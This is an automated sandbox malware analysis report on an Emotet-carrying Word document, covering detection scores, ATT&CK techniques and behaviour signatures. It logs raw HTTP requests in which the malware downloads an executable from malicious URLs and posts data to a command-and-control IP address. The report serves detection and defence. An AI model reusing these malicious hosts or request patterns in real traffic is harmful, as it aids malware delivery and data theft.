Loading ...

Play interactive tourEdit tour

Analysis Report S_974960546330.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:188700
Start date:09.11.2019
Start time:00:13:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 17m 23s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:S_974960546330.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.expl.evad.winDOC@19/47@4/4
EGA Information:
  • Successful, ratio: 62.5%
HDC Information:
  • Successful, ratio: 38.7% (good quality ratio 30.8%)
  • Quality average: 65.9%
  • Quality standard deviation: 38.1%
HCA Information:
  • Successful, ratio: 68%
  • Number of executed functions: 149
  • Number of non-executed functions: 288
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, TiWorker.exe, wermgr.exe, MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe, Integrator.exe
  • Excluded IPs from analysis (whitelisted): 13.107.3.128, 13.107.5.88, 52.109.88.8, 52.109.124.19, 52.114.158.91, 2.16.216.50, 2.16.216.40, 52.109.8.20, 8.248.129.254, 8.248.115.254, 67.26.83.254, 67.27.234.126, 8.248.131.254, 205.185.216.42, 205.185.216.10, 40.90.137.120, 40.90.23.247, 40.90.137.127, 93.184.220.29, 20.44.86.43, 51.143.111.7, 52.158.208.111
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fg.download.windowsupdate.com.c.footprint.net, client-office365-tas.msedge.net, cs9.wac.phicdn.net, 2-01-3cf7-0009.cdx.cedexis.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, a767.dspw65.akamai.net, vs.login.msa.akadns6.net, prd.col.aria.mobile.skypedata.akadns.net, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, watson.telemetry.microsoft.com, config.edge.skype.com, pipe.cloudapp.aria.akadns.net, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, pipe.skype.com, config.officeapps.live.com, login.msa.akadns6.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
  • Execution Graph export aborted for target WINWORD.EXE, PID 384 because there are no executed function
  • Execution Graph export aborted for target powershell.exe, PID 1732 because it is empty
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Windows Management Instrumentation1Valid Accounts1Valid Accounts1Software Packing1Input Capture1System Time Discovery1Remote File Copy12Input Capture1Data Encrypted12Commonly Used Port1
Replication Through Removable Media1PowerShell2Modify Existing Service11Access Token Manipulation1Deobfuscate/Decode Files or Information11Network SniffingPeripheral Device Discovery11Replication Through Removable Media1Data from Removable MediaExfiltration Over Other Network MediumRemote File Copy12
Drive-by CompromiseScripting2New Service12New Service12Scripting2Input CaptureSecurity Software Discovery51Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22
Exploit Public-Facing ApplicationExecution through API1System FirmwareDLL Search Order HijackingFile Deletion1Credentials in FilesSystem Service Discovery1Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol4
Spearphishing LinkExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information31Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol24
Spearphishing AttachmentCommand-Line Interface11Modify Existing ServiceNew ServiceMasquerading21Brute ForceSystem Information Discovery45Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceService Execution2Path InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionQuery Registry1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port
Supply Chain CompromiseThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryProcess Discovery2Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer Protocol
Trusted RelationshipRundll32DLL Search Order HijackingService Registry Permissions WeaknessDLL Side-Loading1Input PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer Encryption
Hardware AdditionsPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainRemote System Discovery1Taint Shared ContentAudio CaptureConnection Proxy

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://www.eximalert.com/dhxq/XweuZD/Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\20.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for sampleShow sources
Source: S_974960546330.docAvira: detection malicious, Label: VBA/Dldr.Agent.hpdyc
Source: S_974960546330.docJoe Sandbox ML: detected
Multi AV Scanner detection for domain / URLShow sources
Source: eximalert.comVirustotal: Detection: 7%Perma Link
Source: axocom.frVirustotal: Detection: 7%Perma Link
Source: www.eximalert.comVirustotal: Detection: 7%Perma Link
Source: http://www.eximalert.com/dhxq/XweuZD/Virustotal: Detection: 18%Perma Link
Source: https://orchaskiddiesworld.com/t24dfh/ea/Virustotal: Detection: 16%Perma Link
Source: https://axocom.fr/wp-admin/maint/d01/Virustotal: Detection: 14%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\20.exeVirustotal: Detection: 17%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: S_974960546330.docVirustotal: Detection: 59%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\20.exeCode function: 8_2_00FA207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,8_2_00FA207B
Source: C:\Users\user\20.exeCode function: 8_2_00FA215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,8_2_00FA215A
Source: C:\Users\user\20.exeCode function: 8_2_00FA1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,8_2_00FA1FFC
Source: C:\Users\user\20.exeCode function: 8_2_00FA1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00FA1F75
Source: C:\Users\user\20.exeCode function: 8_2_00FA1F56 CryptGetHashParam,8_2_00FA1F56
Source: C:\Users\user\20.exeCode function: 8_2_00FA1F11 CryptExportKey,8_2_00FA1F11
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,10_2_001E1F75
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,10_2_001E1FFC
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,10_2_001E207B
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,10_2_001E215A
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1F11 CryptExportKey,10_2_001E1F11
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1F56 CryptGetHashParam,10_2_001E1F56

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)Show sources
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Users\user\20.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\20.exeCode function: 7_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,7_2_00415B40
Source: C:\Users\user\20.exeCode function: 8_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,8_2_00415B40
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,9_2_00415B40
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,10_2_00415B40
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6EA02957 FindFirstFileExA,27_2_6EA02957
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E99B125 FindFirstFileExW,FindClose,27_2_6E99B125

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\20.exeCode function: 4x nop then sub esp, 1Ch7_2_00416890
Source: C:\Users\user\20.exeCode function: 4x nop then sub esp, 1Ch8_2_00416890
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 4x nop then sub esp, 1Ch9_2_00416890
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 4x nop then sub esp, 1Ch10_2_00416890
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: axocom.fr
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49720 -> 116.203.228.95:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49720 -> 116.203.228.95:443

Networking:

barindex
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-dosexecExpires: Fri, 08 Nov 2019 23:15:20 GMTLast-Modified: Fri, 08 Nov 2019 23:15:20 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5dc5f70840a50=1573254920; expires=Fri, 08-Nov-2019 23:16:20 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="aGgc7oFyNpM7rNCLGQ.exe"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 08 Nov 2019 23:15:20 GMTContent-Length: 201300Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 ac d9 c5 5d 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 1c 00 76
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /dhxq/XweuZD/ HTTP/1.1Host: www.eximalert.comConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /vermont/forced/pdf/merge/ HTTP/1.1Referer: http://74.208.125.192/vermont/forced/pdf/merge/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.208.125.192:443Content-Length: 632Connection: Keep-AliveCache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Source: unknownTCP traffic detected without corresponding DNS query: 74.208.125.192
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1383 InternetReadFile,10_2_001E1383
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /dhxq/XweuZD/ HTTP/1.1Host: www.eximalert.comConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmpString found in binary or memory: .hotmail.com1&0 equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: <html class="no-js" lang="fr-FR" xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns# fb: http://www.facebook.com/2008/fbml" > equals www.facebook.com (Facebook)
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: LinkedIn equals www.linkedin.com (Linkedin)
Source: powershell.exe, 00000005.00000002.1948413882.000001BA05E50000.00000004.00000020.sdmpString found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)
Source: WINWORD.EXE, 00000000.00000002.2864736894.000000000059C000.00000004.00000020.sdmpString found in binary or memory: api/v1/linkedin/associations2 equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmpString found in binary or memory: hotmail.co.uk1 equals www.hotmail.com (Hotmail)
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmpString found in binary or memory: hotmail.com1 equals www.hotmail.com (Hotmail)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: axocom.fr
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /vermont/forced/pdf/merge/ HTTP/1.1Referer: http://74.208.125.192/vermont/forced/pdf/merge/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.208.125.192:443Content-Length: 632Connection: Keep-AliveCache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: sspiresize.exe, 0000000A.00000002.2886522610.0000000000639000.00000004.00000001.sdmpString found in binary or memory: http://74.208.125.192/vermont/forced/pdf/merge/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://axocom.frxhl
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: http://blog.innovaPB
Source: powershell.exe, 00000005.00000002.1951326528.000001BA08042000.00000004.00000001.sdmpString found in binary or memory: http://blog.innovaccer.com
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: http://blog.innovaccer.com/phqg/aM/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://blog.innovaccer.com/phqg/aM/xhl
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: http://blog.innovaccer.comxhl
Source: powershell.exe, 00000005.00000003.1945815594.000001BA1FEF0000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0#
Source: powershell.exe, 00000005.00000003.1945815594.000001BA1FEF0000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000005.00000002.1958912172.000001BA1FD68000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmpString found in binary or memory: http://crl.m
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: http://eximalert.comxhl
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: powershell.exe, 00000005.00000002.1958436507.000001BA17DD6000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000003.1945815594.000001BA1FEF0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1763463479.000000000C77A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesI
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png(~0
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngxhl
Source: WINWORD.EXEString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagrams
Source: WINWORD.EXEString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: WINWORD.EXE, 00000000.00000003.1928543862.0000000018887000.00000004.00000001.sdmpString found in binary or memory: http://scas.openformatrg/drawml/2006/main
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.m
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mic
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micro
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micros
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microso
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft
Source: WINWORD.EXE, 00000000.00000003.2194889380.000000000C804000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
Source: WINWORD.EXE, 00000000.00000003.1928457670.0000000018857000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
Source: WINWORD.EXE, 00000000.00000003.1928457670.0000000018857000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: powershell.exe, 00000005.00000002.1950220766.000001BA07C40000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000012.00000003.2827613456.00000249D69ED000.00000004.00000001.sdmpString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxsion6?m
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.1956108228.000001BA08ED2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html(~0
Source: powershell.exe, 00000005.00000002.1956446860.000001BA0902A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlxhl
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: powershell.exe, 00000005.00000002.1951326528.000001BA08042000.00000004.00000001.sdmpString found in binary or memory: http://www.eximalert.com
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: http://www.eximalert.com/dhxq/XweuZD/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: http://www.eximalert.com/dhxq/XweuZD/xhl
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: http://www.eximalert.comxhl
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: msiexec.exe, 00000012.00000003.2827613456.00000249D69ED000.00000004.00000001.sdmpString found in binary or memory: http://www.tagvault.org/tv_extensions.xsd
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: WINWORD.EXE, 00000000.00000002.2878802980.000000000DD46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apioonho
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apir
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apir12345VmMy
